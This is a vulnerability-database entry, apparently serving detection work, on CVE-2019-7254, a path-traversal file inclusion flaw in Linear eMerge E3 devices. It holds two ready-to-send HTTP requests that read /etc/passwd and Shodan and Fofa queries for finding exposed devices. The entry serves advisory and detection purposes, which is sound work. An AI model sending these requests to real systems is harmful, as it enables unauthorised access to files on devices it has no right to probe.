🔙 목록으로 돌아가기

CVE-2019-7254: eMerge E3 1.00-06 - Local File Inclusion

TitleeMerge E3 1.00-06 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
RemediationApply the latest security patch or update to a non-vulnerable version of eMerge E3.
CVSS Score7.5
EPSS Score0.90623
CVE IDCVE-2019-7254
CWE IDCWE-22
Shodan Queryhttp.title:"emerge"
Fofa Querytitle="emerge"
Tags cve cve2019 emerge lfi edb packetstorm nortekcontrol vkev vuln

🔍 Vulnerability Description

Linear eMerge E3-Series devices are vulnerable to local file inclusion.

🌐 HTTP Request

GET /?c=../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-7254.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-7254.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A